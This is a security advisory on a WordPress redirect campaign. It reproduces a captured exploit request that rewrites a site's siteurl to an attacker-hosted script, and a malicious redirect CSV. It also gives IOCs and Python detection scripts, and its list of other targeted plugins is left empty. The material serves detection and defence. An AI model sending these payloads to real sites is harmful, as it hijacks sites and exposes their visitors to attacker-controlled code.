Malicious WordPress Redirect Campaign Attacking Several Plugins

Over the past few weeks, our Threat Intelligence team has been tracking an active attack campaign targeting a selection of new and old WordPress plugin vulnerabilities. These attacks seek to maliciously redirect traffic from victims’ sites to a number of potentially harmful locations.

Each of the vulnerabilities targeted by this campaign has been public for some time, and Wordfence users are protected either by individual firewall rules or by generic protections built into the plugin. Two of the vulnerabilities in question have firewall rules which are currently available to Premium users only:

  • NicDark Plugins – Unauthenticated Arbitrary Options Update
    • Though several individual plugins are affected, the vulnerability is the same across each and they are covered by a single firewall rule.
    • Affected plugin slugs are prefixed with nd-. Example plugins include Components For WP Bakery Page Builder (slug: nd-shortcodes), Booking (slug: nd-booking), Travel Management (slug: nd-travel), etc.
    • Firewall rule released for Premium users on July 30, 2019
    • Available for Free users starting August 29, 2019
  • Simple 301 Redirects Addon – Bulk Uploader <= 1.2.5 – Unauthenticated Options Update
    • Firewall rule released for Premium users on August 6, 2019
    • Available for Free users starting September 5, 2019

Each of these plugins has an update available which resolves the vulnerability. All WordPress users, regardless of firewall status, are advised to keep their plugins up-to-date at all times.

In today’s post we’ll look at the attacks associated with this campaign, and we’ll provide some useful indicators of compromise (IOCs) to assist in identifying similar activity.

Attacks Against NicDark Plugins

The vulnerabilities recently patched in plugins developed by NicDark are all exploited by very similar AJAX requests. In each case the plugin registers a nopriv_ AJAX action, which is reachable even by unauthenticated visitors, that imports WordPress settings. In these requests, key/value pairs of WordPress option names and values are parsed out of the request and written directly to the affected site’s database.

For example, the following POST request is an attempt to attack the Travel Management plugin:

POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Range: bytes=0-1000000
Connection: keep-alive
Host: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_travel_end_option%5D

In each case, the targeted plugin must be declared in both the action parameter and the GET query string parameter defining the new option values, such as this example’s nd_travel_value_import_settings.

Because these vulnerabilities allow unauthenticated users to modify arbitrary WordPress options, it’s possible for attackers to enable registration as an Administrator user. However, we don’t see that behavior associated with this attack campaign. Instead, as seen in the sample request above, the attackers are modifying the siteurl setting of the victim’s site. In this case, the new value is https://jackielovedogs.com/pret.js?l=1. A subsequent request would then make the same change for the home setting.

The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path. For example, instead of a site’s jQuery script loading from https://example.com/wp-includes/js/jquery/jquery.js, it would instead cause the visitor’s browser to open the URL https://jackielovedogs.com/pret.js?l=1/wp-includes/js/jquery/jquery.js. In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.
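
The request above can be recognised and decoded from web server or WAF logs. The following Python script is an added example written for this post, not code from Wordfence or from the NicDark plugins: it parses the `<option>[<slug>_option_value]<value>[<slug>_end_option]` payload shape shown in the sample request, checks that the plugin slug in the action name and the parameter name agree, and flags any request that would point siteurl or home at a host other than the site’s own. The request records, the watch list of options and the second (nd_booking, home) request are constructed for the example; only the Travel Management request mirrors the one shown above.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Options that, once rewritten to an off-site URL, make every page load
# attacker-controlled script. Assumption: a watch list chosen for this
# example, not a list enumerated by the post.
SENSITIVE_OPTIONS = {"siteurl", "home"}

# The nd_* import actions share one shape; the plugin slug appears in the
# action name, in the parameter name, and in both bracketed markers.
ACTION_RE = re.compile(r"^(?P<slug>nd_[a-z0-9_]+)_import_settings_php_function$")
PAYLOAD_RE = re.compile(
    r"(?P<option>[A-Za-z0-9_\-]+)\[(?P<slug>nd_[a-z0-9_]+)_option_value\]"
    r"(?P<value>.*?)\[(?P=slug)_end_option\]"
)


def parse_import_payload(body: str) -> List[Dict[str, str]]:
    """Extract the option/value pairs an nd_* import request would write.

    Returns an empty list for any request that is not an nd_* settings import.
    """
    params = parse_qs(body, keep_blank_values=True)
    action = ACTION_RE.match(params.get("action", [""])[0])
    if not action:
        return []
    slug = action.group("slug")
    raw = params.get(f"{slug}_value_import_settings", [""])[0]
    # The %26 in the captured body decodes to a literal '&' inside the value,
    # so the marker scan runs on the decoded parameter, not on the raw body.
    return [
        {"slug": slug, "option": m.group("option"), "value": m.group("value")}
        for m in PAYLOAD_RE.finditer(raw)
        if m.group("slug") == slug
    ]


def analyze_request(path: str, body: str, site_host: str) -> Optional[dict]:
    """Flag an admin-ajax POST that would point siteurl/home at another host."""
    url = urlsplit(path)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    changes = parse_import_payload(body)
    if not changes:
        return None
    slug = changes[0]["slug"]
    offsite = []
    for change in changes:
        if change["option"] not in SENSITIVE_OPTIONS:
            continue
        host = urlsplit(change["value"]).hostname or ""
        if host and host != site_host:
            offsite.append((change["option"], host))
    if not offsite:
        return None
    return {
        "slug": slug,
        # The campaign names the plugin in the query string as well as the body.
        "query_param_present": f"{slug}_value_import_settings" in parse_qs(url.query),
        "offsite": offsite,
    }


# Constructed request records (not captured traffic): the first mirrors the
# Travel Management request shown above; the second is a benign admin-ajax
# call; the third imitates the follow-up 'home' change the post describes,
# here against nd_booking, using the same constructed URL encoding.
SAMPLE_REQUESTS = [
    {
        "ip": "192.0.2.10",
        "path": "/wp-admin/admin-ajax.php?nd_travel_value_import_settings="
                "siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1",
        "body": "action=nd_travel_import_settings_php_function&nd_travel_value_import_settings="
                "siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1"
                "%26%5Bnd_travel_end_option%5D",
    },
    {"ip": "198.51.100.7", "path": "/wp-admin/admin-ajax.php", "body": "action=heartbeat&_nonce=abc"},
    {
        "ip": "192.0.2.10",
        "path": "/wp-admin/admin-ajax.php?nd_booking_value_import_settings="
                "home%5Bnd_booking_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1",
        "body": "action=nd_booking_import_settings_php_function&nd_booking_value_import_settings="
                "home%5Bnd_booking_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1"
                "%26%5Bnd_booking_end_option%5D",
    },
]


def scan_requests(records, site_host: str) -> List[dict]:
    """Run analyze_request over logged records; returns one finding per hit."""
    findings = []
    for rec in records:
        hit = analyze_request(rec["path"], rec["body"], site_host)
        if hit:
            findings.append({"ip": rec["ip"], **hit})
    return findings


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS, "example.com"):
        where = "query+body" if f["query_param_present"] else "body only"
        print(f["ip"], f["slug"], f["offsite"], where)
```

The check keys on the option being rewritten to a foreign host rather than on any particular domain, so it still fires after the campaign rotates to a new domain; feeding it real records requires a log source that retains POST bodies, since the decisive parameter is in the body.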

Attacks Against Simple 301 Redirects Addon – Bulk Uploader

The other most common attack vector we’ve tracked in this campaign is the Simple 301 Redirects – Addon – Bulk Uploader plugin, which recently patched a vulnerability allowing unauthenticated attackers to inject their own 301 redirect rules onto a victim’s site.

Vulnerable versions of the plugin checked every incoming request for the POST body parameter submit_bulk_301, with no authentication check. If that parameter was present, an uploaded CSV file would be processed and used to import a bulk set of site paths and their redirect destinations.

The following is an example of the CSV files attackers are attempting to upload:

/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?

When a vulnerable site processes this CSV, the site will begin redirecting all of its traffic to the addresses provided.
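
A site owner reviewing a rule import, or a maintainer adding validation to a bulk uploader, would want to catch exactly the rows above before they are applied. The following Python script is an added example, not code from Wordfence or from the Simple 301 Redirects Addon: it reads the CSV rule format shown above (source path, destination), flags catch-all sources (`/`, `*`, `/*`) and destinations on a host other than the site’s own, and rejects the upload when a rule is both. The CSV text and the two benign rows are constructed for the example; only the first three rows mirror the ones above.

```python
import csv
import io
from typing import List
from urllib.parse import urlsplit

# Source paths that match every request. Uploading any of these with an
# external destination turns the whole site into a redirect.
CATCH_ALL_SOURCES = {"/", "*", "/*"}

# Constructed upload content: the three rows shown above plus two benign
# rules a site owner might legitimately import.
SAMPLE_CSV = """/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?
/old-page,/new-page
/blog/2018,https://example.com/blog/2018
"""


def audit_redirect_rules(csv_text: str, site_host: str) -> List[dict]:
    """Return one finding per rule that is catch-all, off-site, or both.

    A rule that is both is rated 'high': it redirects every visitor off-site.
    """
    findings = []
    for lineno, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        if len(row) < 2:
            continue  # blank or malformed line; nothing to apply
        source, destination = row[0].strip(), row[1].strip()
        # Relative destinations (no scheme/host) have hostname None and are
        # treated as on-site.
        dest_host = urlsplit(destination).hostname
        reasons = []
        if source in CATCH_ALL_SOURCES:
            reasons.append("catch-all source")
        if dest_host and dest_host != site_host:
            reasons.append(f"external destination {dest_host}")
        if reasons:
            findings.append({
                "line": lineno,
                "source": source,
                "destination": destination,
                "reasons": reasons,
                "severity": "high" if len(reasons) == 2 else "medium",
            })
    return findings


def should_reject_upload(csv_text: str, site_host: str) -> bool:
    """Reject an import that contains any catch-all, off-site rule."""
    return any(f["severity"] == "high" for f in audit_redirect_rules(csv_text, site_host))


if __name__ == "__main__":
    for finding in audit_redirect_rules(SAMPLE_CSV, "example.com"):
        print(finding["line"], finding["severity"], finding["source"], "->",
              finding["destination"], ";", ", ".join(finding["reasons"]))
    print("reject upload:", should_reject_upload(SAMPLE_CSV, "example.com"))
```

An off-site destination on a specific path is reported at medium severity rather than rejected, because redirecting one retired URL to another domain is a legitimate use of the plugin; the combination of a catch-all source and a foreign host is what has no legitimate reading.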

Other Targeted Plugins

In addition to the primary two above, we have identified related attacks against a number of other formerly-vulnerable plugins, including (but not limited to):

Payload Behavior Analysis

The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off. We provide a list of the domains we’ve identified in the IOC section below.

At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, despite the fact that these domains still show up in active attacks at the time of this writing. For example jackielovedogs.com, which appeared in the example request in the ND plugin section above, appears to have been reclaimed by Registrar.eu, a reseller name used by ICANN registrar Openprovider.

Further analysis of this campaign’s long-term behavior is ongoing, and we will provide a followup report as necessary.

Indicators of Compromise (IOCs)

The following IOCs can be used in the process of identifying or tracking activity associated with this campaign.

IP Addresses

The attacks are distributed across a large number of IPs. The top 20 IPs associated with this campaign are listed below. Additionally, addresses listed in bold text appear in the list of IPs Attacking Most Sites as seen in the most recent Wordfence Weekly.

  1. 192.99.38.186
  2. 51.38.69.87
  3. 62.210.252.196
  4. 164.132.44.97
  5. 159.203.81.46
  6. 217.182.95.250
  7. 51.255.43.81
  8. 37.187.198.246
  9. 54.36.246.232
  10. 45.55.152.56
  11. 198.199.100.240
  12. 162.241.175.243
  13. 188.213.175.168
  14. 45.40.143.13
  15. 188.213.166.219
  16. 192.169.227.95
  17. 193.70.2.138
  18. 149.202.75.164
  19. 192.169.157.142
  20. 104.238.97.201

Domain Names

  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • go.activeandbanflip.com
  • wiilberedmodels.com
  • developsincelock.com
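
The domain list above is most useful when matched against the two options this campaign rewrites. The following Python script is an added example, not Wordfence code: it takes (option_name, option_value) rows as they would come from a wp_options export, reports any siteurl or home value whose host is not the site’s own, and marks whether that host is one of the IOC domains above or a subdomain of one. The sample rows are constructed for the example; the option watch list is an assumption of the example rather than something the post enumerates.

```python
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit

# Domains from the IOC list above.
IOC_DOMAINS = [
    "greatinstagrampage.com",
    "gabriellalovecats.com",
    "jackielovedogs.com",
    "tomorrowwillbehotmaybe.com",
    "go.activeandbanflip.com",
    "wiilberedmodels.com",
    "developsincelock.com",
]

# The options the campaign rewrites. Assumption for this example.
URL_OPTIONS = {"siteurl", "home"}


def ioc_domain_match(host: str, ioc_domains: Iterable[str]) -> bool:
    """True when host is an IOC domain or a subdomain of one.

    The comparison is label-aware, so 'notjackielovedogs.com' does not match
    'jackielovedogs.com', while 'cdn.jackielovedogs.com' does.
    """
    host = host.lower().rstrip(".")
    for dom in ioc_domains:
        dom = dom.lower()
        if host == dom or host.endswith("." + dom):
            return True
    return False


def audit_site_options(rows: Iterable[Tuple[str, str]], expected_host: str,
                       ioc_domains: Iterable[str] = IOC_DOMAINS) -> List[dict]:
    """Report siteurl/home rows that no longer point at the site's own host."""
    ioc_domains = list(ioc_domains)
    findings = []
    for name, value in rows:
        if name not in URL_OPTIONS:
            continue
        host = urlsplit(value).hostname or ""
        if host == expected_host:
            continue
        findings.append({
            "option": name,
            "value": value,
            "host": host,
            "known_ioc": ioc_domain_match(host, ioc_domains),
        })
    return findings


# Constructed wp_options rows (not a dump from a real site): siteurl has been
# rewritten in the way described above, home is still correct.
SAMPLE_OPTIONS = [
    ("siteurl", "https://jackielovedogs.com/pret.js?l=1"),
    ("home", "https://example.com"),
    ("blogname", "Example Site"),
]


if __name__ == "__main__":
    for finding in audit_site_options(SAMPLE_OPTIONS, "example.com"):
        tag = "known IOC domain" if finding["known_ioc"] else "unknown host"
        print(f'{finding["option"]} -> {finding["value"]} ({tag})')
```

A rewritten option whose host is not on the list is still reported, since the post notes that the campaign’s domains rotate every few days; the IOC match only tells you which campaign you are most likely looking at.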

Conclusion

An active campaign is targeting a number of vulnerabilities in attempts to redirect victim sites’ visitors to potentially harmful destinations. The vulnerabilities in question have all been patched by their developers, so ensure all of your WordPress plugins are up to date. Wordfence Premium users who are unable to update are protected from all of these attacks, while Free users will gain access to these rules in the coming weeks.

Our investigation into these attacks is ongoing. We will continue to track further changes in the campaign’s infrastructure and will provide followup reports as necessary.

As always, please consider sharing this post with your peers to spread awareness of this malicious activity. Additionally, if you believe your site has fallen victim to these or any other attacks, our site cleaning team is here to help. Thank you for reading.


Comments

24 Comments
  • Thanks for this breakdown, I have noticed attacks, in general, continue to increase but we continue to fight back!

    Wordfence is my go-to resource for keeping up to date with these new threats, so thanks and keep up the good work!

    • Thanks, David!

  • We saw the 301 Redirect Bulk Uploader in the wild. Thanks for this update!

  • Would it be helpful to add those IP addresses to the blocked IP address section in our WordPress dashboard?

    • Yes, these IPs are associated with quite a bit of malicious activity. Many of these IPs are covered under our Real-time IP blacklist for Premium users as well.

  • Thanks for the update.

    Had one of my sites redirect with this redirect some 2 months ago using the plugin Yellow Pencil.
    Tried to contact them but didn't get far. The only workaround was to remove this plugin and all was fine.

    Thanks again, guys. This list of hacked code is super helpful. Is there a place we can advise when we find a hack?

    • If you'd ever like to provide attack data to our team for review, you can email us at samples@wordfence.com. We love emergent threat data.

    • Hi There,

      I think you were using the old version of the plugin; that's why you got hacked. All versions 7.2.0 and higher are safe.

      By the way, they respond to tickets in 24 hours.

  • Thank you for this information. I was using one of NicDark's plugins on a site. I deleted it.

  • This is why I am about to embark upon a course of study for a degree in Applied Technology at BYU-I, specializing in Cyber Security !!!

    Thanks for all your hard work and keeping us posted!

  • Some attacker attacked a lot of my clients' websites, and they use a very simple technique. They just replace the index file and upload some other files which redirect only the front pages, but the admin pages are accessible.

  • Thanks for the heads-up! So should we just outright block these IP Addresses by adding them to our permanent block list?

  • Thank you for this information.
    Best!

  • Hi,
    If these domains are blacklisted in our dns, can this help?
    Cheers

    • Hi Jimmy! Blocking the redirect domains at the DNS level will prevent devices in that network from being redirected.

  • Amazing, really helpful.

  • Hey Mikey, thanks a lot! Just want to check if there are any further updates since 8/23? And do we have any clue what the intention behind this campaign would be? Seems more like just click fraud?

    • Attacks are still ongoing, but no big changes worth reporting at this time.

      Money is the motivator, as the people behind the malicious ads themselves pay for their distribution.

  • Hello, we had this attack twice on a website. Two lines in the database were switched with these ones:
    (1, 'siteurl', 'https://wiilberedmodels.com/rend.js?l=1&', 'yes'),
    (2, 'home', 'https://wiilberedmodels.com/rend?l=1&', 'yes'),

    I still haven't been able to pinpoint the cause, since none of the listed plugins is installed.

    Hybrid Composer, EU Cookie Law, Disable Gutenberg, Background Update Tester or the Techline theme could be the cause.

    • Hi Daniele! The attackers add and remove vulnerabilities from their rotation fairly frequently. Hybrid Composer was discovered to have an arbitrary options update vulnerability back in July that would have been exploited to cause this. Updating your plugins will resolve the issue. The associated firewall rule is also available to both Free and Premium Wordfence users.

  • Thanks for the update. This is really useful for my client websites.

  • Also plugin WP Private Content Pro is hacked and exploited by these guys. Update to the latest version issued today!

  • Same issue for the WordPress plugin WP Private Content Plus: all the time the page was redirected to js.wiilberedmodels.com.

    Now there are two recent comments on the WP plugin page: https://pl.wordpress.org/plugins/wp-private-content-plus/#reviews

    • Yes, confirmed, it happened on a customer website with this plugin too.

      Some info: https://www.wpexpertdeveloper.com/major-security-issue-in-wp-private-content-plus-versions-1-31/